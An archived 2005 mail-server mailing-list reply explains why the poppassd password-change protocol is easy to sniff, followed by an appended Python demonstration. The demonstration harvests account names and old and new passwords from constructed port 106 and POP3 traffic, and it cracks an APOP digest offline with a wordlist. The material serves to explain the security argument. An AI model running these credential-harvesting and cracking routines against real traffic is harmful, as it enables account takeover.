Mailing List SIMS@mail.stalker.com Message #15125
From: Bill Cole <listbill@scconsult.com>
Subject: Re: poppassd & Eudora
Date: Fri, 16 Sep 2005 09:09:42 -0400
To: SIMS Discussions <SIMS@mail.stalker.com>
At 1:47 PM -0400 9/15/05, Stefan Jeglinski  imposed structure on a stream of electrons, yielding:
> Allow me to be difficult for just one more moment.
>
> >>> otherwise, why claim that it is so grossly insecure when normal e-mail is so grossly insecure anyway?
> >>
> >> Note that passwords in the clear for email have become fairly uncommon. Even SIMS supports CRAM-MD5 authentication for SMTP and APOP for POP3.
>
> Supporting such and configuring it that way OOTB are 2 different things. You usually have a good pulse on e-mail trends. Given the most common consumer level computers, i.e., Windows XP running Outlook Express, or business installations, i.e., Windows XP running Outlook, is password encryption turned on by default as installed? Or is it turned off, instead relying on ISPs to enforce authentication procedures? Put another way, do ISPs these days still spend a lot of time educating their new users, or is APOP etc. such a common default that new users aren't even aware that they are implementing it?

Every modern mailer provides APOP support and most provide SSL/TLS support. Putting POP3 over SSL/TLS or at least requiring APOP are more common than not with ISPs today. Virtually every SMTP AUTH system supports CRAM-MD5 and clients that use SMTP AUTH will generally use the strongest method available (i.e. most don't even provide the user any visible means to pick which auth method is used.) Some providers (in the US the most notable is Yahoo, which runs the SBC POP3 servers) remain foolish and allow users to use clear passwords if they choose, but I don't think any major ISPs require clear passwords.

In contrast: there is no such thing as a poppassd that does not require passwords in the clear.

> >>> Is there something *beyond* sending passwords in clear text that makes poppassd so insecure?
> >>
> >> 1. It uses a TCP port which, while assigned to a totally different protocol, is in fact only used on the open Internet for this protocol. This makes sniffing the protocol very highly efficient.
>
> Why could I not make the same argument for port 110? (aside from the issue of assignment to another protocol, which I find neutral to the point).

Virtually every packet with any content aimed at port 106 will contain authentication information. Most port 110 traffic is not authentication information, and there's so much more of it. This is why I call sniffing poppassd more efficient: catch 5 packets with payload aimed at port 106 on a poppassd host and you may have 3 accounts in hand.

I am more worried today about sniffable protocols than I was 5 years ago for sound reasons. 5 years ago it would have been unusual to find a home machine running trojan bots doing keystroke logging, packet sniffing, and remote control service. Now it is a normal circumstance. A Windows machine whose owner has not been very careful is more likely than not to be running software designed to steal their private information, and many of those programs include pieces like keyloggers and packet sniffers. It no longer requires a router crack to sniff traffic between end users and their ISP mail systems.


> >> 2. It provides a sniffer instant knowledge of how to use a sniffed password to take over an account completely, i.e. how to change the password himself.
>
> This one I readily concede. Thanks for pointing it out.


--
Bill Cole                                  bill@scconsult.com
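The two points above (nearly every port 106 packet carries authentication material, and the poppassd dialogue itself tells the sniffer how to take the account over) can be made concrete with a passive-observer simulation. The following is an added example, not code from this thread or from SIMS or any poppassd implementation. It assumes the Eudora-style poppassd client commands (user / pass / newpass / quit) and the POP3 USER/PASS and APOP commands from RFC 1939; the "capture" is a constructed list of client-to-server payloads, not real traffic, and all account names and secrets are invented. It also shows the caveat that APOP only hides the password from the wire: the digest is still subject to an offline dictionary attack.

```python
"""Constructed poppassd (tcp/106) and POP3 (tcp/110) client traffic as seen by a
passive sniffer on the path between an end user and the ISP mail host."""
import hashlib

# Port 106 is assigned to 3com-tsmux, but in practice only poppassd speaks on it.
POPPASSD_PORT = 106
POP3_PORT = 110

# Commands whose argument is an account name or a secret.
AUTH_COMMANDS = {"USER", "PASS", "NEWPASS", "APOP", "AUTH"}


def apop_digest(banner: str, password: str) -> str:
    """APOP (RFC 1939): MD5 over the server's timestamp banner plus the shared secret."""
    return hashlib.md5((banner + password).encode()).hexdigest()


# Constructed sample: (dst_port, client payload). Account names, passwords and the
# banner are made up. The poppassd command names follow the Eudora poppassd dialogue.
APOP_BANNER = "<1896.697170952@mail.example.net>"
CAPTURE = [
    (106, b"user alice\r\n"),
    (106, b"pass Hunter2!\r\n"),
    (106, b"newpass Correct-Horse\r\n"),
    (106, b"quit\r\n"),
    (110, b"USER carol\r\n"),               # clear-text POP3 login
    (110, b"PASS s3cret\r\n"),
    (110, b"STAT\r\n"),
    (110, b"LIST\r\n"),
    (110, b"RETR 1\r\n"),
    (110, ("APOP bob " + apop_digest(APOP_BANNER, "b0bsPass")).encode() + b"\r\n"),
    (110, b"STAT\r\n"),
    (110, b"QUIT\r\n"),
]


def _split(payload: bytes):
    """Return (COMMAND, argument) for one client line."""
    cmd, _, arg = payload.decode(errors="replace").strip().partition(" ")
    return cmd.upper(), arg


def harvest_poppassd(packets):
    """Every poppassd session hands the sniffer the account, its old and its new password."""
    found, user, old = {}, None, None
    for port, payload in packets:
        if port != POPPASSD_PORT:
            continue
        cmd, arg = _split(payload)
        if cmd == "USER":
            user, old = arg, None
        elif cmd == "PASS":
            old = arg
        elif cmd == "NEWPASS" and user is not None:
            found[user] = {"old": old, "new": arg}
    return found


def harvest_pop3(packets):
    """POP3: a clear PASS yields the secret, APOP yields only a one-time digest."""
    found, user = {}, None
    for port, payload in packets:
        if port != POP3_PORT:
            continue
        cmd, arg = _split(payload)
        if cmd == "USER":
            user = arg
        elif cmd == "PASS" and user is not None:
            found[user] = {"password": arg}
        elif cmd == "APOP":
            name, _, digest = arg.partition(" ")
            found[name] = {"apop_digest": digest}  # no password on the wire
    return found


def auth_packet_ratio(packets, port):
    """(packets carrying auth material, total packets) for one destination port:
    the 'efficiency' of sniffing that port."""
    seen = [_split(p)[0] for dst, p in packets if dst == port]
    return sum(1 for c in seen if c in AUTH_COMMANDS), len(seen)


def crack_apop(banner: str, digest: str, wordlist):
    """Offline guess against a sniffed APOP digest; returns the password or None."""
    for guess in wordlist:
        if apop_digest(banner, guess) == digest:
            return guess
    return None


if __name__ == "__main__":
    print("poppassd:", harvest_poppassd(CAPTURE), auth_packet_ratio(CAPTURE, 106))
    print("pop3:", harvest_pop3(CAPTURE), auth_packet_ratio(CAPTURE, 110))
    bob = harvest_pop3(CAPTURE)["bob"]["apop_digest"]
    print("APOP offline guess:", crack_apop(APOP_BANNER, bob, ["letmein", "b0bsPass"]))
```

On this constructed sample three of the four poppassd packets carry an account name or a password and the session yields both the current and the replacement password, whereas only three of eight POP3 packets carry authentication material at all and the APOP login gives the sniffer a digest rather than a secret. The last function is the caveat to the APOP argument: the digest is bound to one banner, but a weak password still falls to an offline dictionary run, which is why POP3 over SSL/TLS is the stronger of the two options discussed.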
